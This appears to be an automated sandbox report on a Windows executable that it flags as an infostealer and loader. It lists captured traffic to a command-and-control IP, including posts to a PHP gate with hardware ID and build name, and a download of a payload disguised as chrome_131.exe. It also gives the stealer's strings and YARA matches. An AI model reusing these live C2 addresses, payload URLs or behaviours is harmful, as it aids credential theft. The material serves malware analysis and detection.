                    Source: global trafficHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 45.91.200.39Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHDAAECAEBKJKFHJKECF--
                    Source: Joe Sandbox ViewIP Address: 87.106.236.48 87.106.236.48
                    Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 45.91.200.39:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49731 -> 87.106.236.48:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.39
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                    Source: global trafficHTTP traffic detected: GET /tmpp/chrome_131.exe HTTP/1.1Host: gosp.clinicavertigen.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.91.200.39Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1Host: 45.91.200.39Cache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: gosp.clinicavertigen.com
                    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 45.91.200.39Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.91.200.39
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/4e
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.91.200.39/cb9cc10e175e1537/sqlite3.dll
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/cb9cc10e175e1537/sqlite3.dllqKo
                    Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php1f9a9c4a2f8b514.cdf-ms
                    Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php4
                    Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.phpp
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.phpsition:
                    Source: b4s45TboUL.exe, 00000000.00000003.1764389556.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php~1.d
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.91.200.396
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.91.200.39FHDHDA
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiC
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/#
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/-
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/pData
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exe
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exeac
                    Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exen
                    Source: b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
                    Source: b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                    System Summary

                    barindex
                    Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE0DE0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_6CFE0DE0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFEEC600_2_6CFEEC60
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFC9DF10_2_6CFC9DF1
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFA5DB00_2_6CFA5DB0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFCFDA00_2_6CFCFDA0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFDED700_2_6CFDED70
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFBCEB00_2_6CFBCEB0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFC8E000_2_6CFC8E00
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE5F200_2_6CFE5F20
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFCD8F00_2_6CFCD8F0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFCF8E00_2_6CFCF8E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFC88A00_2_6CFC88A0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE390E0_2_6CFE390E
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE8BE00_2_6CFE8BE0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE4BC00_2_6CFE4BC0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFB85E00_2_6CFB85E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE15E00_2_6CFE15E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFA257C0_2_6CFA257C
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFEE6800_2_6CFEE680
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFA27E00_2_6CFA27E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFEA7D10_2_6CFEA7D1
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFD17580_2_6CFD1758
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFFD7350_2_6CFFD735
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFB40D00_2_6CFB40D0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFCF1D00_2_6CFCF1D0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFA61700_2_6CFA6170
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFB82C00_2_6CFB82C0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFE22900_2_6CFE2290
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFF13D60_2_6CFF13D6
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFFF3400_2_6CFFF340
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EAD2AC0_2_61EAD2AC
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E4B8A10_2_61E4B8A1
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E75F1F0_2_61E75F1F
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E400650_2_61E40065
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E9E24F0_2_61E9E24F
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E625540_2_61E62554
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E9A4A70_2_61E9A4A7
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E4E4BF0_2_61E4E4BF
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E947830_2_61E94783
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E7A7900_2_61E7A790
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E187360_2_61E18736
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E866680_2_61E86668
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E586700_2_61E58670
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E6667F0_2_61E6667F
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EA0BA90_2_61EA0BA9
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E62CA30_2_61E62CA3
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E98FE20_2_61E98FE2
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E88FCA0_2_61E88FCA
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E52F800_2_61E52F80
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EA2F470_2_61EA2F47
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E56F180_2_61E56F18
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E4CEF90_2_61E4CEF9
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E1EEFF0_2_61E1EEFF
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EA91F60_2_61EA91F6
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E651DD0_2_61E651DD
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E9316A0_2_61E9316A
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E9F0ED0_2_61E9F0ED
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EA70CF0_2_61EA70CF
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E9D0C30_2_61E9D0C3
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E8D0B60_2_61E8D0B6
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E6904E0_2_61E6904E
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E4304E0_2_61E4304E
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E153370_2_61E15337
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E672DC0_2_61E672DC
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E192080_2_61E19208
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E534E30_2_61E534E3
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E774520_2_61E77452
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E379300_2_61E37930
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\Google\Chrome\updater.exe 0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\HIIDGCGCBF.exe 0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: String function: 6CFFFDB0 appears 39 times
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: String function: 00404610 appears 317 times
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: String function: 6CFF1380 appears 33 times
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: String function: 6CFED850 appears 70 times
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556
                    Source: chrome_131[1].exe.0.drStatic PE information: Number of sections : 14 > 10
                    Source: updater.exe.4.drStatic PE information: Number of sections : 14 > 10
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Number of sections : 14 > 10
                    Source: b4s45TboUL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
